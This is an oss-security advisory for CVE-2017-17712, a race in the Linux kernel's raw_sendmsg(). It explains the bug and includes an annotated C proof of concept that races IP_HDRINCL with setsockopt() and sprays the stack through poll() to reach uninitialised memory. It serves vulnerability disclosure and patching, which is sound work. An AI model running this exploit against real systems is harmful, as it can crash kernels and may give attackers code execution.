List: oss-security
Subject: [oss-security] CVE-2017-17712 net/ipv4/raw.c: raw_sendmsg() race condition
From: Mohamed Ghannam <simo.ghannam () gmail ! com>
Date: 2017-12-16 0:29:09
Message-ID: CAP8jf_BKWuYGsqrNUCbJgCFUJv0nJvp+eiKEy3Ati0FYaCED0Q () mail ! gmail ! com
Hi,
This is an announcement for CVE-2017-17712, a race condition that leads
to an uninitialized stack variable; this might be used to gain code execution.
The bug was introduced here :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c008ba5bdc9fa830e1a349b20b0be5a137bdef7a
And fixed here :
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8f659a03a0ba9289b9aeb9b4470e6fb263d6f483
####### BUG DETAILS ############
in net/ipv4/raw.c:
static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
{
...
struct raw_frag_vec rfv; [1]
...
...
if (!inet->hdrincl) { [2]
rfv.msg = msg;
rfv.hlen = 0;
err = raw_probe_proto_opt(&rfv, &fl4);
if (err)
goto done;
}
...
...
if (inet->hdrincl) [3]
err = raw_send_hdrinc(sk, &fl4, msg, len,
&rt, msg->msg_flags, &ipc.sockc);
else {
sock_tx_timestamp(sk, ipc.sockc.tsflags, &ipc.tx_flags);
if (!ipc.addr)
ipc.addr = fl4.daddr;
lock_sock(sk);
err = ip_append_data(sk, &fl4, raw_getfrag,
&rfv, len, 0, [4]
&ipc, &rt, msg->msg_flags);
...
}
[1] rfv is declared without an initializer; it contains a pointer to a msghdr
structure.
[2], [3] inet->hdrincl is read more than once without holding a lock, so its value can change between the two checks.
When inet->hdrincl is raced via setsockopt() so that it reads as 1 at [2]
and as 0 at [3], rfv is never initialized but is still used at [4].
By spraying the stack with controlled user data, we can take control of the
msg pointer, which is used later in ip_append_data().
Attached: poc.c and the kernel panic log.
####### CREDITS ############
Mohamed GHANNAM
["panic.log" (application/octet-stream)]
["poc.c" (text/x-csrc)]
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <poll.h>
/* Report a failed call through perror() when cond is true. It only
 * reports: it does not exit, so callers continue with the failed result
 * (create_socket() returns a negative fd, for example). The expansion is
 * a bare if-block rather than do { } while (0). */
#define CHKERR(cond,msg) if((cond)) { \
perror((msg)); \
}
/* Size in bytes of buf and of every iovec element built in prepare_sendmsg(). */
#define PSIZE 100
/* Number of thread pairs started by racy(). */
#define TIDSIZE 10000
pthread_t tid1[TIDSIZE]; /* do_setsockopt_hdrincl() threads */
pthread_t tid2[TIDSIZE]; /* do_sendmsg_for_race() threads */
int val0 = 0; /* IP_HDRINCL value (0) written by the tid1 threads */
struct msghdr *msg = NULL; /* built once by prepare_sendmsg(); read by every tid2 thread */
struct sockaddr_in sin= {.sin_port = 0}; /* destination; zeroed again in prepare_sendmsg() */
struct iovec iov[256]; /* every entry points at buf */
int i; /* file-scope loop index used by prepare_sendmsg(); racy() shadows it with a local */
unsigned char buf[PSIZE]; /* filled with 0xcc by prepare_sendmsg() */
char payload[2048]; /* passed to poll() by do_poll(), cast to struct pollfd[] */
int fdsock; /* raw socket from create_socket(), shared by all threads */
/* Move the calling process into a new user namespace and then a new
 * network namespace via unshare(); exits with 1 or 2 if either call
 * fails. Presumably done so the raw socket opened later does not need
 * privileges in the initial namespace -- the code itself only shows the
 * two unshare() calls. */
void create_ns(void)
{
if(unshare(CLONE_NEWUSER) != 0) {
perror("unshare(CLONE_NEWUSER)");
exit(1);
}
if(unshare(CLONE_NEWNET) != 0) {
/* NOTE(review): the message names CLONE_NEWUSER, but this is the CLONE_NEWNET call. */
perror("unshared(CLONE_NEWUSER)");
exit(2);
}
}
/* pthread body: writes the int that arg points to into IP_HDRINCL on the
 * global socket fdsock. racy() passes &val0, so this side of the race
 * keeps setting the option back to 0. A failure is reported by CHKERR
 * but otherwise ignored; the hard-coded length 4 stands in for
 * sizeof(val). Always returns NULL. */
void *do_setsockopt_hdrincl(void *arg)
{
int err,val;
val = *(int*)arg;
err = setsockopt(fdsock,SOL_IP,IP_HDRINCL,&val,4);
CHKERR(err,"setsockopt_int");
return NULL;
}
/* poll() on the payload buffer reinterpreted as 256 struct pollfd entries,
 * with a zero timeout. Per the advisory's "spraying the stack" description
 * this appears to be that step; the code itself shows only the poll() call.
 * The cast relies on 256 * sizeof(struct pollfd) fitting in the 2048-byte
 * payload -- confirm for the target ABI. The return value is ignored. */
void do_poll(void)
{
poll((struct pollfd*)payload,256,0);
}
/* Open a raw IPv4 ICMP socket and return its descriptor. CHKERR only
 * prints on failure, so a negative fd is returned as-is and later used
 * by the threads. */
int create_socket(void)
{
int fd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
CHKERR(fd < 0,"socket");
return fd;
}
/* Build the msghdr that every sendmsg() thread reuses: 256 iovec entries
 * that all point at buf (PSIZE bytes of 0xcc), a zeroed sockaddr_in as
 * the destination, and no control data. Also primes payload for
 * do_poll(): all zero except 8 bytes of 0x11 at offset 156. Uses the
 * file-scope loop index i. Returns a malloc()ed msghdr that is never
 * freed; calls exit(-1) if malloc fails. The local msg shadows the
 * global of the same name, which main() assigns from the return value. */
struct msghdr *prepare_sendmsg(void)
{
struct msghdr *msg; /* shadows the global msg */
int off = 156; /* offset of the 8-byte 0x11 marker inside payload */
memset(buf,0xcc,PSIZE);
memset(payload,0x00,2048);
memset(payload+off , 0x11,8);
for(i=0;i<256;i++) {
iov[i].iov_base = buf;
iov[i].iov_len = PSIZE;
}
msg = malloc(sizeof(struct msghdr));
if(!msg) {
perror("malloc");
exit(-1);
}
memset(msg,0,sizeof(struct msghdr));
/* Overwrites sin's designated initializer: family, port and address all end up 0. */
memset(&sin,0,sizeof(sin));
msg->msg_name = &sin;
msg->msg_namelen = sizeof(sin);
msg->msg_iov = iov;
msg->msg_iovlen = 256;
msg->msg_control = NULL;
msg->msg_controllen = 0;
msg->msg_flags = 0;
return msg;
}
/* pthread body for the other side of the race: sets IP_HDRINCL to 1 on
 * the socket whose descriptor arg points to (racy() passes &fdsock),
 * runs do_poll(), then calls sendmsg() with the shared global msg.
 * Neither setsockopt() nor sendmsg() is checked, so a thread gives no
 * indication of whether its sendmsg() succeeded. Always returns NULL. */
void *do_sendmsg_for_race(void *arg)
{
int val = 1;
int fd = *(int*)arg;
setsockopt(fd,SOL_IP,IP_HDRINCL,&val,4);
do_poll();
sendmsg(fd,msg,0);
return NULL;
}
/* Drive the race: start TIDSIZE pairs of threads, one resetting
 * IP_HDRINCL to 0 (do_setsockopt_hdrincl with &val0) and one setting it
 * to 1 and calling sendmsg() (do_sendmsg_for_race with &fdsock), then
 * join them all. pthread_create() return values are not checked, so a
 * failed create leaves the zero-initialised file-scope tid slot as-is
 * and pthread_join() is still called on it. The local i shadows the
 * file-scope i used by prepare_sendmsg(). */
void racy(void)
{
int i;
for(i=0;i<TIDSIZE;i++) {
pthread_create(&tid1[i],NULL,do_setsockopt_hdrincl,(void*)&val0);
pthread_create(&tid2[i],NULL,do_sendmsg_for_race,(void*)&fdsock);
}
for(i=0;i<TIDSIZE;i++) {
pthread_join(tid1[i],NULL);
pthread_join(tid2[i],NULL);
}
}
/* Entry point: enter new namespaces, open the raw socket, build the
 * shared msghdr, then run the race. argc/argv are unused. Nothing is
 * closed or freed, and the exit status is 0 regardless of outcome. */
int main(int argc,char **argv)
{
create_ns();
fdsock = create_socket();
msg = prepare_sendmsg();
racy();
return 0;
}